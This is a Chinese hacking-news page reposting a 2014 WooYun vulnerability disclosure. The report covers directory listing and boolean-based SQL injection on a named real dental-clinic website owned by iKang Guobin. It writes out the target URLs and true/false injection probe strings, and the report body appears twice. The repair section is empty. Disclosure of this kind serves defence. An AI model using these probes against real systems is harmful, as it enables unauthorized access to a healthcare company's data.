记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

爱康国宾某后台系统列目录外加sql注入

2014-10-11 23:25

http://a.ikangdental.com/



爱康牙齿。爱康国宾旗下。



1.列目录



http://a.ikangdental.com/Account/



http://a.ikangdental.com/GGXX/



2.sql注入



http://a.ikangdental.com/GGXX/List.aspx?id=



4.png





http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d6



2.png





http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d2



3.png





1.jpg



漏洞证明:

http://a.ikangdental.com/



爱康牙齿。爱康国宾旗下。



1.列目录



http://a.ikangdental.com/Account/



http://a.ikangdental.com/GGXX/



2.sql注入



http://a.ikangdental.com/GGXX/List.aspx?id=



4.png





http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d6



2.png





http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d2



3.png



修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-074052

阅读:101068 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“爱康国宾某后台系统列目录外加sql注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云